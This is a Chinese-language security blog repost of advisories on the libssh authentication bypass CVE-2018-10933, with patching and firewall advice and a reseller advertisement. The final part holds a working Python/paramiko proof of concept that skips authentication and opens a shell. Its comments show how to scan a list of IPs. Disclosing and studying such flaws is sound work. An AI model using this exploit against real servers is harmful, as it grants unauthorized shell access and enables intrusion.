SSH登陆验证绕过漏洞CVE-2018-10933
2018年10月17日,阿里云云盾应急响应中心监测到libssh官方发布安全公告,披露了一个SSH2登陆身份验证绕过漏洞(CVE-2018-10933)。攻击者利用漏洞可以在没有任何凭据的情况下成功进行身份验证,甚至可能登陆SSH。
漏洞描述
libssh版本0.6及更高版本在服务端代码中具有身份验证绕过漏洞。
通过向服务端发送SSH2_MSG_USERAUTH_SUCCESS消息来代替服务端期望启动身份验证的SSH2_MSG_USERAUTH_REQUEST消息,攻击者可以在没有任何凭据的情况下成功进行身份验证,甚至可能登陆SSH,入侵服务器。
影响范围
libssh0.6及以上的版本
风险评级
CVE-2018-10933:严重
安全建议
目前各大发行版OS暂未发布相应的package补丁,云盾提供临时解决方案参考如下:
方案一:
下载官方patch文件:https://www.libssh.org/security/,重新安装libssh修复漏洞
方案二:
在各大发行版OS发布相应的package补丁前,建议禁止SSH对外,或使用阿里云控制台远程连接管理服务器
禁止SSH对外,只针对特定允许的ip开放访问权限,可通过安全组配置,参考如下:
我们会关注后续进展,请随时关注官方公告。如有任何问题,可随时通过工单或服务电话027-87498031联系反馈。
武汉捷讯信息技术有限公司是一家专门从事互联网服务、软件开发、计算机和通信系统集成及电信增值业务的高科技互联网企业,官方授权唯一指定阿里云湖北授权服务中心、阿里云区域服务提供商,请各位有需求的客户,认准官网,全国咨询热线:027-87498031。
CVE-2018-10933
======================================================================= == Subject: Authentication bypass in server code == == CVE ID#: CVE-2018-10933 == == Versions: All versions of libssh 0.6 and later == == Summary: There is a vulnerability within the server code which == can enable a client to bypass the authentication == process and set the internal state machine maintained == by the library to authenticated, enabling the == (otherwise prohibited) creation of channels. == ======================================================================= =========== Description =========== libssh versions 0.6 and above have an authentication bypass vulnerability in the server code. By presenting the server an SSH2_MSG_USERAUTH_SUCCESS message in place of the SSH2_MSG_USERAUTH_REQUEST message which the server would expect to initiate authentication, the attacker could successfully authentciate without any credentials. The bug was discovered by Peter Winter-Smith of NCC Group. ================== Patch Availability ================== Patches addressing the issue have been posted to: https://www.libssh.org/ libssh version 0.8.4 and libssh 0.7.6 have been released to address this issue. ========== Workaround ========== There is no workaround for this issue. ======= Credits ======= The bug was discovered by Peter Winter-Smith of NCC Group. Patches are provided by the Anderson Toshiyuki Sasaki of Red Hat and the libssh team. ========================================================== == The libssh team ==========================================================
测试代码:
https://github.com/blacknbunny/libSSH-Authentication-Bypass
拓展阅读(点评/知识):
POC:
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
#cve-2018-10933
#gzaq
#greekn
#2018/10/18/
#POC-T.py -s cve-2018-10933 -iF iplist.txt -eG
#POC-T.py -s cve-2018-10933 -iS 166.156.121.24
import paramiko
import socket
def poc(url):
print '[*] %s' % url
sock = socket.socket()
try:
sock.connect((url, int(22)))
# instantiate transport
m = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(m)
cmd_channel = transport.open_session()
cmd_channel.invoke_shell()
return 0
except socket.error as e:
print('[-] Connecting to host failed. Please check the specified host and port.')
return 1
来源:https://github.com/greekn/awakening-conscience/blob/master/POC-T/script/CVE-2018-10933.py
本文标题: | SSH登陆验证绕过漏洞CVE-2018-10933 |
本文链接: (转载请附上本文链接) | https://vulsee.com/archives/vulsee_2018/1018_7049.html |